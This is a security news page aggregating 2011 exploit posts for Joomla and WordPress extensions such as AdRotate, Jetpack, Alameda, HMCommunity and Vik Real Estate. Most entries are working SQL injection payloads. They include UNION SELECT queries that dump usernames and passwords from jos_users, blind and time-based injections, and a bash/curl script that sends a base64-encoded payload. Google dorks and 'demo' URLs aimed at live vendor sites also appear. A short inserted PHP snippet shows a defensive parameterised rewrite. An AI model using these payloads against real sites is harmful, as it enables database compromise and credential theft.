Joomla, Wordpress and Drupal news

Security news on the Joomla, Wordpress and Drupal CMSs.

############################################################################

# Exploit Title: QContacts 1.0.6 (Joomla component) SQL injection

# Google Dork: inurl:"/components/com_qcontacts/"

# Date: December/08/2011

# Author: Don (BalcanCrew & BalcanHack)

# Software Link: http://www.latenight-coding.com/joomla-addons/qcontacts.html

# Version: 1.0.6

# Tested on: Apache

############################################################################

Vulnerability:

This vulnerability affects /index.php

/index.php?option=com_qcontacts?=catid=0&filter_order=[SQLi]&filter_order_Dir=&option=com_qcontacts

How to fix this vulnerability:

Filter metacharacters from user input.

~Don 2011

[~] Joomla Component Jobprofile (com_jobprofile) SQL Injection Vulnerability

[~] Author : kaMtiEz

[~] Homepage : http://www.indonesiancoder.com / http://exploit-id.com / http://magelangcyber.web.id

[~] Date : 2 Dec , 2011

[ Software Information ]

[+] Vendor : http://www.thakkertech.com/

[+] INFO : http://extensions.joomla.org/extensions/ads-a-affiliates/jobs-a-recruitment/11924

[+] Download : http://www.thakkertech.com/products/joomla-extensions/components/jobprofile-joomla-component-detail.html

[+] Version : null / 1.0 maybe :D

[+] Price : 25,00 €

[+] Vulnerability : SQL INJECTION

[+] Dork : "think it :D"

[+] LOCATION : – INDONESIA -

Read more...

######################################################

# Exploit Title: WordPress jetpack plugin SQL Injection Vulnerability

# Date: 2011-19-11

# Author: longrifle0x

# software: Wordpress

# Download:http://wordpress.org/extend/plugins/jetpack/

# Tools: SQLMAP

######################################################

DESCRIPTION

Discovered a vulnerability in jetpack, Wordpress Plugin,

vulnerability is SQL injection.

File:wp-content/plugins/jetpack/modules/sharedaddy.php

Exploit: id=-1; or 1=if

Exploitation

http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php
[GET][id=-1][CURRENT_USER()

http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php
[GET][id=-1][SELECT (CASE WHEN ((SELECT super_priv FROM mysql.user WHERE user='None' LIMIT 0,1)='Y') THEN 1 ELSE 0 END)

http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php
[GET][id=-1][MID((VERSION()),1,6)

# Exploit Title: WordPress AdRotate plugin <= 3.6.6 SQL Injection Vulnerability

# Date: 2011-11-8

# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)

# Software Link: http://downloads.wordpress.org/plugin/adrotate.3.6.6.zip

# Version: 3.6.6 (tested)

# Note: parameter $_GET["track"] has to be Base64 encoded

---

PoC

---

http://www.site.com/wp-content/plugins/adrotate/adrotate-out.php?track=MScgQU5EIDE9SUYoMj4xLEJFTkNITUFSSyg1MDAwMDAwLE1ENShDSEFSKDExNSwxMTMsMTA4LDEwOSw5NywxMTIpKSksMCkj

e.g.

#!/bin/bash

payload="1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)#"

# command substitution, not single quotes; -w 0 keeps the base64 output on one line
encoded=$(printf '%s' "$payload" | base64 -w 0)

curl "http://www.site.com/wp-content/plugins/adrotate/adrotate-out.php?track=$encoded"

---------------

Vulnerable code

---------------

if(isset($_GET['track']) OR $_GET['track'] != '') {
    $meta = base64_decode($_GET['track']);
    ...
    list($ad, $group, $block) = explode("-", $meta);
    ...
    $bannerurl = $wpdb->get_var($wpdb->prepare("SELECT 'link' FROM '".$prefix."adrotate' WHERE 'id' = '".$ad."' LIMIT 1;")); //wrong (mis)usage of wpdb->prepare()
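For comparison, the same lookup written the way $wpdb->prepare() is meant to be used (an added example, not AdRotate's own code; it assumes the $wpdb object and $prefix variable from the snippet above and a hypothetical function name):

```php
<?php
// Added example (not AdRotate's code). In the vulnerable snippet $ad is concatenated
// into the SQL string before prepare() sees it, so prepare() has nothing to escape.
// Here the value goes through a %d placeholder, and identifiers are quoted with
// backticks (single quotes, as in the original, turn 'link' and 'id' into string literals).
function adrotate_banner_url_safe($wpdb, $prefix, $track) {
    // strict base64 decoding rejects input that is not valid base64 at all
    $meta = base64_decode((string) $track, true);
    if ($meta === false) {
        return null;
    }

    // expect exactly "ad-group-block"; anything else is rejected, not guessed at
    $parts = explode('-', $meta);
    if (count($parts) !== 3 || !ctype_digit($parts[0])) {
        return null;
    }
    $ad = (int) $parts[0];   // only an integer id ever reaches the query

    $sql = $wpdb->prepare(
        "SELECT `link` FROM `{$prefix}adrotate` WHERE `id` = %d LIMIT 1",
        $ad
    );
    return $wpdb->get_var($sql);
}
```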

/*

------------------------------------------------------------------------

Wordpress Zingiri Web Shop Plugin <= 2.2.3 Remote Code Execution Exploit

------------------------------------------------------------------------

author...............: Egidio Romano aka EgiX

mail.................: n0b0d13s[at]gmail[dot]com

software link........: http://wordpress.org/extend/plugins/zingiri-web-shop/

affected versions....: from 0.9.12 to 2.2.3

+-------------------------------------------------------------------------+

| This proof of concept code was written for educational purpose only. |

| Use it at your own risk. Author will be not responsible for any damage. |

+-------------------------------------------------------------------------+

Read more...

============================================================

FOREGROUND SECURITY, SECURITY ADVISORY 2011-003

- Original release date: November 9, 2011

- Discovered by: Jose Carlos de Arriba (Sr Security Analyst at Foreground Security)

- Contact: (jcarriba (at) foregroundsecurity (dot) com, dade (at) painsec (dot) com)

- Twitter: @jcarriba

- Severity: 4.3/10 (Base CVSS Score)

============================================================

I. VULNERABILITY

-------------------------

Joomla ALFContact 1.9.3 Extension Multiple Cross-Site Scripting (XSS) vulnerabilities - (prior versions have not been checked but could be vulnerable too).

Read more...

######################################################
# Exploit Title: WordPress WP Glossary plugin SQL Injection Vulnerability
# Date: 2011-30-10
# Author: longrifle0x
# software: Wordpress
# Download: http://wordpress.org/extend/plugins/wp-glossary/
# Tools: SQLMAP
######################################################

DESCRIPTION
Discovered a vulnerability in WP Glossary, Wordpress Plugin,
vulnerability is SQL injection.
File: wp-content/plugins/wp-glossary/ajax.php
Exploit: id=-1; or 1=if

Exploitation
http://localhost:80/wp-content/plugins/wp-glossary/ajax.php
[GET][id=-1][CURRENT_USER()
http://localhost:80/wp-content/plugins/wp-glossary/ajax.php
[GET][id=-1][SELECT (CASE WHEN ((SELECT super_priv FROM mysql.user WHERE user='None' LIMIT 0,1)='Y') THEN 1 ELSE 0 END)
http://localhost:80/wp-content/plugins/wp-glossary/ajax.php
[GET][id=-1][MID((VERSION()),1,6)

[~] Joomla Component Alameda (com_alameda) SQL Injection Vulnerability
[~] Author : kaMtiEz
[~] Homepage : http://www.indonesiancoder.com / http://exploit-id.com / http://magelangcyber.web.id
[~] Date : 1 Nov , 2011

[ Software Information ]

[+] Vendor : http://www.blueflyingfish.com/alameda/
[+] INFO : http://extensions.joomla.org/extensions/e-commerce/e-commerce-bridges/18018
[+] Download : http://www.blueflyingfish.com/alameda/index.php?option=com_content&view=article&id=3
[+] version : 1.0
[+] Vulnerability : SQL INJECTION
[+] Dork : "CiHuY"
[+] LOCATION : - INDONESIA -


[ Vulnerable File ]

http://127.0.0.1/[kaMtiEz]/index.php?option=com_alameda&controller=comments&task=edit&storeid=1[SQL]

[ XpL ]

http://127.0.0.1/[kaMtiEz]/index.php?option=com_alameda&controller=comments&task=edit&storeid=-1+union+all+select+concat_ws(0x3a,username,password)+from+jos_users--

[ Demo ]

http://www.blueflyingfish.com/alameda/index.php?option=com_alameda&controller=comments&task=edit&storeid=-1+union+all+select+concat_ws(0x3a,username,password)+from+jos_users--

[ FIX ]

dunno :">

# [+] Joomla Component com_hmcommunity Multiple Vulnerabilities
# [+] Software : Joomla
# [+] Download : http://joomlaextensions.co.in/product/HM-Community
# [+] Author : 599eme Man
# [+] Contact :
#
#[------------------------------------------------------------------------------------]
#
# [+] Vulnerabilities
#
# [+] SQL
#
# - http://site.com/index.php?option=com_hmcommunity&view=fnd_home&id=[NB] union select all 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
#
# [+] Demo
#
# - http://www.hmcommunity.harmistechnology.com/index.php?option=com_hmcommunity&view=fnd_home&id=155 union select all 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
#
# [+] Blind SQL
#
# - http://site.com//index.php?option=com_hmcommunity&view=fnd_home&id=155 and @@version=5
#
# [+] Demo
#
# - http://www.hmcommunity.harmistechnology.com/index.php?option=com_hmcommunity&view=fnd_home&id=155%20and%20@@version=5
#
# [+] Persistent XSS
#
# - The XSS is on the profile. You have to create an account and put your code in inputs.
#
# [+] Demo
#
# - Create an account and look this profile : http://www.hmcommunity.harmistechnology.com/index.php?option=com_hmcommunity&view=fnd_profile&uid=155
#
#[------------------------------------------------------------------------------------]
#
#########################################################################################################

###################################################################
Techfolio 1.0 Component Joomla SQL Injection
###################################################################

Release Date Bug. 27-Oct-2011
Date Added. 30-Sep-2011
Vendor Notification Date. Never
Product. Techfolio
Platform. Joomla
Affected versions. 1.0
Type. Non-Commercial
Attack Vector. Sql Injection
Solution Status. unpublished
CVE reference. Not yet assigned
Download. techdeluge.com/joomla-component/com_techfolio.zip

Read more...

*************************************************************************************
# Exploit Title: Joomla mod_adsense modules SQL Injection Vulnerability
# Date: 2011-29-10
# Author: longrifle0x
# software: Joomla
# Tools: SQLMAP
# Exploit: id=-1; or 1=if
*************************************************************************************
http://localhost/modules/mod_adsense/mod_adsense.php
http://localhost/modules/mod_adsense/mod_adsense.php [GET][id=-1]UNION ALL SELECT 1, 2, 3, CONCAT_WS(CHAR(58,106,97,115,58),CHAR(110,76,105,102,69,111,79,87,114,97),CHAR(58,111,99,109,58))#---
http://localhost/modules/mod_adsense/mod_adsense.php [GET][id=-1][MID((VERSION()),1,6)

###################################################################
Vik Real Estate 1.0 Component Joomla Multiple Blind Sql Injection
###################################################################

Release Date Bug. 27-Oct-2011
Date Added. 30-Sep-2011
Vendor Notification Date. Never
Product. Vik Real Estate
Platform. Joomla
Affected versions. 1.0
Type. Commercial
Price. €69.00
Attack Vector. Blind Sql Injection
Solution Status. unpublished
CVE reference. Not yet assigned
Download http://www.extensionsforjoomla.com/vik-real-estate/joomla-extensions/vik-real-estate?vmcchk=1

I. BACKGROUND

Extension to manage real estates with details and description.
Main Functions:
- Manage Types of Contract (rental, selling, etc.)
- Condition of use (commercial, residential, etc.)
- Types of houses (apartment, villa, etc.)
- Manage Features (garden, garage, pool, etc. with icons)
- Manage States/Cities and Areas (New York City, Soho; Florence, Airport; etc.)
Add real estates with description and images.
Search module included.

II. DESCRIPTION

Two vulnerabilities have been discovered in Vik Real Estate, a Joomla component;
both are blind injections (boolean-based/time-based blind & blind).

The parameters affected are:
contract
imm

III. EXPLOITATION


parameter [contract]:

//index.php?option=com_vikrealestate&act=results&contract=1' AND 1=1 AND '666'='666&adibit=1&prov=1&area=_any&pricemin=_any&pricemax=_any&mqmin=0&mqmax=_any&type=_any&gores=Search

parameter [imm]:

//index.php?option=com_vikrealestate&act=show&imm=3' AND 1=1 AND '666'='666



Discovered by.
Chris Russell

###################################################################
JEEMA SMS 3.2 Component Joomla Multiple Vulnerabilities
###################################################################

Release Date Bug. 28-Oct-2011
Date Added. 30-January-2010
Vendor Notification Date. Never
Product. JEEMA SMS
Platform. Joomla
Affected versions. 3.2
Type. Commercial
Price. $115.00
Attack Vector. Multiple
Solution Status. unpublished
CVE reference. Not yet assigned
Download. http://www.shopping.jeema.net/index.php?main_page=product_info&cPath=1&products_id=2&zenid=dc8442eed192c973fe776f9cd16a1a6c

Read more...

####################################################################################
Barter Sites 1.3 Component Joomla SQL Injection & Persistent XSS vulnerabilities
####################################################################################

Release Date Bug. 28-Oct-2011
Date Added. 01-Oct-2011
Vendor Notification Date. Never
Product. Barter Sites
Platform. Joomla
Affected versions. 1.3
Type. Commercial
Price. $99
Attack Vector. Sql Injection & Persistent XSS
Solution Status. unpublished
CVE reference. Not yet assigned
Download. www.barter-sites.com/content/getStarted

Read more...

# Exploit Title: WordPress wptouch plugin SQL Injection Vulnerability
# Date: 2011-27-10
# Author: longrifle0x
# software: Wordpress
# Tools: SQLMAP
---------------
(POST data)
---------------

http://www.site.com/wp-content/plugins/wptouch/ajax.php

#Exploit: id=-1; id=- AND SLEEP(5) or 1=if

http://site.com/wp-content/plugins/wptouch/ajax.php [GET][id=-1][CURRENT_USER()

http://site.com/wp-content/plugins/wptouch/ajax.php [GET][id=-1][SELECT (CASE WHEN ((SELECT super_priv FROM mysql.user WHERE user='None' LIMIT 0,1)='Y') THEN 1 ELSE 0 END)

http://site.com/wp-content/plugins/wptouch/ajax.php [GET][id=-1][MID((VERSION()),1,6)